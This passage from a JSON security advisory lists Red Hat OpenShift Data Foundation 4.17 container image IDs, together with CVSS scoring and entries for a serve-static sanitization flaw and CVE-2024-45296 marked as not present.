"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
